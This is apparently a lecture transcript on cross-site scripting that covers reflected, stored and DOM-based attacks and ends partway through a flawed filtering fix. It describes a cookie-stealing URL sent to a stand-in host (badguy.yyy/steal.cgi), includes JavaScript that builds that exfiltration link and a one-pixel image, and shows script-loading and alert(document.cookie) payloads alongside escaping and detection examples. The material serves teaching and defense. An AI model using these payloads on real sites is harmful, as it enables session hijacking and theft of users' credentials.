The next slide shows the essence of cross-site scripting. If you go to a web page, the web server sends over commands, and your web browser interprets those commands to draw up an image. Now, if you look at the first HTML, which is the language used for these web pages, this one says, start a paragraph and say hello. And then the script tags say, between the beginning and the end of these tags, execute whatever is there. And in this case, it's something you don't expect and don't want, which is nasty. That's what is called malicious logic. So what happens in this case is the web browser first puts up hello with the exclamation point and then does the commands in the middle. And that's cross-site scripting. There are three forms of these attacks: reflected, stored, and what's called DOM injection.

The next slide shows a reflected attack. We have a website that requires you to authenticate to gain access. Once you've gained that access, the website stores a session cookie, and that cookie is kept wherever your browser stores cookies. The next time you connect to that site, the site will say, send over your cookies, and the authentication cookie goes over along with any others. And then the site says, okay, you're authenticated, we'll just go ahead and act.

Now, the way the attack usually works is the attacker sends out a large number of messages, emails typically, with a URL in them, and the URL basically points to the remote site. But it also contains a script, and the script will simply say, copy the cookies for that site and send them to this second site, the bad guy or gal's site. So if you look at the HTML there, it's going to draw up an image. And by the way, when this is done, the image is often very small, like a pixel, so you can't see it. But in this case, the image it's going to draw is simply something from xxx.yyy. However, when you try to log in to that account there, you've got a script.
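To make the script in that URL concrete, here is a minimal sketch of the logic it might carry. The function names are hypothetical and the slide's exact markup is not reproduced here; the only details taken from the talk are the attacker address http://badguy.yyy/steal.cgi?, the tiny image, and the idea of appending the victim's cookie. In a real browser the cookie string would come from document.cookie; here it is passed in as a plain string so the sketch runs anywhere.

```javascript
// Hypothetical reconstruction of the injected script's logic (not the slide's code).
// In a browser, cookieString would be document.cookie for the site xxx.yyy.
function buildExfiltrationUrl(cookieString) {
  // encodeURIComponent keeps "=", ";" and spaces from breaking the query string.
  return "http://badguy.yyy/steal.cgi?" + encodeURIComponent(cookieString);
}

// The markup the attacker wants drawn: a one-pixel image whose source is the
// attacker's URL, so the browser requests it without the victim noticing.
function buildInjectedMarkup(cookieString) {
  const url = buildExfiltrationUrl(cookieString);
  return '<img src="' + url + '" width="1" height="1">';
}

console.log(buildInjectedMarkup("session=abc123; theme=dark"));
```

The point of the sketch is only that the request to the bad site is an ordinary image fetch, with the cookie riding along in the query string.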
And so what the script does is it goes to the data and then sends over the URL http://badguy.yyy/steal.cgi?, concatenated with the cookie for the appropriate website, that is, xxx.yyy. And it can access that cookie even if you have third-party cookies turned off, because the request comes from the web page you're going to, so it goes ahead and sends that out. And then presumably what will come back is the legitimate name of the account, and then you'll be able to go ahead and log in. So when the victim clicks on that particular URL, the attacker gets all the cookies, and thereby access as the victim.

Going on to the next slide: that attack comes through email and such. But spam filters are fairly good about finding those. And in general, a good rule of thumb is don't click on it if you don't know what's there. Or your mail system may not show HTML, may not draw HTML pages when you look at the mail. So there's another trick an attacker can use. Most people have gone to a blog at least once in their life, and you see that remote people can enter information into the blog. The data that you enter into the blog, the blog entry, is saved on the server. And then when someone comes in to view the blog, among other things, that entry will come up. Well, that entry comes up and is drawn there on your browser. So why not embed commands in that? And that's basically what stored cross-site scripting is. The attacker stores the malicious URL or HTML on a page where you will go. And it's important to understand that the attacker does not need to be the person who controls the web server. Anyone who can write to the blog can do this sort of thing.

So here is an example. Suppose my blog allows me to insert HTML commands in what I enter when I'm typing my comment, and most of them do. If they don't check for particular commands, I can enter something like the line under "blog comment allows this."
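As a rough illustration of that blog scenario, the sketch below shows a hypothetical blog that draws a stored comment verbatim, next to a variant that escapes HTML first. The comment text, the function names, and the exact script tag are assumptions for illustration (the talk only names mysite/messwithyou.js), and escaping is one common way of "checking" input, not necessarily the one on the slides.

```javascript
// Replace the characters that let text be interpreted as HTML markup.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical blog renderer that trusts the stored comment completely.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + "</div>";
}

// Same renderer, but the comment is escaped before it is drawn.
function renderCommentEscaped(comment) {
  return '<div class="comment">' + escapeHtml(comment) + "</div>";
}

// Assumed example of what an attacker might type into the comment box.
const storedComment =
  'Nice post! <script src="http://mysite/messwithyou.js"></script>';

console.log(renderCommentUnsafe(storedComment));  // script tag survives as markup
console.log(renderCommentEscaped(storedComment)); // script tag becomes inert text
```

Without the escaping step, the stored comment reaches every later reader's browser as live markup.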
What that line will do is download the script from mysite/messwithyou.js, which is JavaScript, and then go ahead and execute it in your browser. So if that command is in the blog, the next person to look at it gets caught, and messwithyou will go ahead and run in their browser.

Now, the next slide talks about something that's a little bit more complex. It's called DOM, the Document Object Model. And this is really how browsers work: they get a Document Object Model, and then use that model to display the object, which is parts of a web page. Now, the reason this is interesting is that with stored XSS and reflected XSS, you assume that the web page you're storing to, or going to, or whatever, is static. DOM XSS is similar, but it allows you to do a little bit more. That remote page is static and is loaded in your browser when you visit. Take, for example, a web page that is going to write out the URL: it takes the base URI of the document, with the URL as the prefix, and document.write will put it up on your browser so you can see it. So the request that I send is listed below. Now, what happens is, when the web browser receives that URL, as soon as it gets to the sharp sign, it instantiates the page and then executes what's between the script tags. And so that will be an alert, which puts up an alert box and may beep. So now, when we go to this web page, it goes ahead and runs document.write on the URL, and then the part after the pound sign gets instantiated, and you get the alert. So this is how DOM cross-site scripting works.

Now, the next slide discusses combinations. And it's important to understand that attacks can get very complex, so these can be combined. The first two are fairly easy because they can be detected at the server: just look for scripts in the input URL, or in the body. If you see those scripts as you're reading things or as your mail program is analyzing things, then you say, hey, wait a minute, and you've caught it.
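A small sketch can show why looking for scripts at the server works for a payload in the query string but not for one after the sharp sign. It relies on one fact not spelled out in the talk: browsers do not send the part of a URL after # to the server. The URLs, the page name page.html, and both function names are hypothetical, and the check itself is deliberately naive.

```javascript
// Return the part of a URL that a server would actually receive.
// Browsers keep everything from "#" onward on the client side.
function serverVisiblePart(url) {
  const hashIndex = url.indexOf("#");
  return hashIndex === -1 ? url : url.slice(0, hashIndex);
}

// Naive server-side check: does the input contain an opening script tag?
// Percent-encoding is decoded first so %3Cscript%3E is also noticed.
function looksLikeScriptInjection(text) {
  let decoded;
  try {
    decoded = decodeURIComponent(text);
  } catch (e) {
    decoded = text; // malformed escapes: fall back to the raw text
  }
  return /<\s*script\b/i.test(decoded);
}

// Hypothetical requests: one carries the script in the query, one after "#".
const reflectedUrl = "http://vulnerable.site/page.html?q=<script>alert(1)</script>";
const domUrl = "http://vulnerable.site/page.html#<script>alert(1)</script>";

console.log(looksLikeScriptInjection(serverVisiblePart(reflectedUrl))); // true
console.log(looksLikeScriptInjection(serverVisiblePart(domUrl)));       // false
```

A real filter would need to handle many more encodings and tag variants; the sketch only illustrates which inputs the server gets a chance to inspect at all.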
The problem is the third one, because the web pages on the server are static. But the DOM attack tricks your browser into putting up something that appears to be from the server, but has a few additions. So the source is where things come from, and the sink is where things go. What you do is you look for sources that others control. On that web page, you have the document base URI. That's dynamic; it's going to be whatever it is in my browser. And as a result, when my browser goes to print that or draw it up on my screen, I am trusting whatever is there. So you need to be careful here: when you accept something from the server and then proceed to draw it, check it before you draw it. And we'll talk about a couple of ways to do this.

First, the wrong way. Here is an attempted fix, okay? The basic idea here is that when I see a script, I'm going to simply comment it out. So here's the web page, and it's vulnerable. Notice the document.write, and the document.URL.substring, and the document.URL.length; all of that is JavaScript. And then notice that pos comes from indexOf("name="). So the idea is a parameter will come over, the parameter's key will be name, and the value is whatever follows name equals, okay? So that's what pos does: it moves beyond the end of name equals. document.URL.length marks the end of the URL, so the substring from pos to there is everything beyond name equals, which is presumably going to be the name of the person. And the URL substring pulls that out. And then the write simply writes up the name, so it would be, hi, Matt, or whatever. And then it will go on and say, welcome to our system, and so forth.

Here's the attack. The next slide first shows the legitimate request, vulnerable.site/welcome.html?name=Matt. And so when I go to that website with that URL, it'll say, hi, Matt, because it gets the name from the field following name equals. But what happens if I do something a little nasty?
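The extraction logic just described can be sketched as a plain function, so it runs outside a browser. This is a reconstruction from the spoken description, not the slide's code: the function names are hypothetical, the URL is passed in as a string instead of being read from document.URL, and the offset past "name=" is inferred from the remark that pos moves beyond the end of name equals.

```javascript
// Pull out whatever follows "name=" in the URL, exactly as described:
// find "name=", step past it, and take the rest of the URL.
function extractName(url) {
  const pos = url.indexOf("name=") + "name=".length;
  return url.substring(pos, url.length);
}

// Stand-in for the page's document.write call: build the greeting text.
// Note that nothing checks what the extracted value contains.
function renderGreeting(url) {
  return "Hi, " + extractName(url);
}

console.log(renderGreeting("http://vulnerable.site/welcome.html?name=Matt"));
// prints "Hi, Matt"
```

Because the value is written out unchecked, the page draws whatever the sender of the URL chose to put after name equals.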
The next one shows that. Now what happens is the name is a script, so the browser is going to execute alert(document.cookie), which will put up the cookie in an alert box. So this one is basically harmless; it notifies you that, hey, look, I've got your cookie. But you can put a lot of other things within that script. Anything JavaScript can do, you can put in there.

So how do we avoid this? Let's try filtering: we scan the input for something that begins with a script tag and then ends with a close script tag. This is on the next slide. Now, the problem is that script, so why don't we just comment it out? That's an easy solution, and you can see where it says, and replace them with this. What I've done is I've replaced script with an open comment, and I've replaced /script, the closing tag, with a close comment. And now when that web page comes up on my browser, it sees the comment, it sees the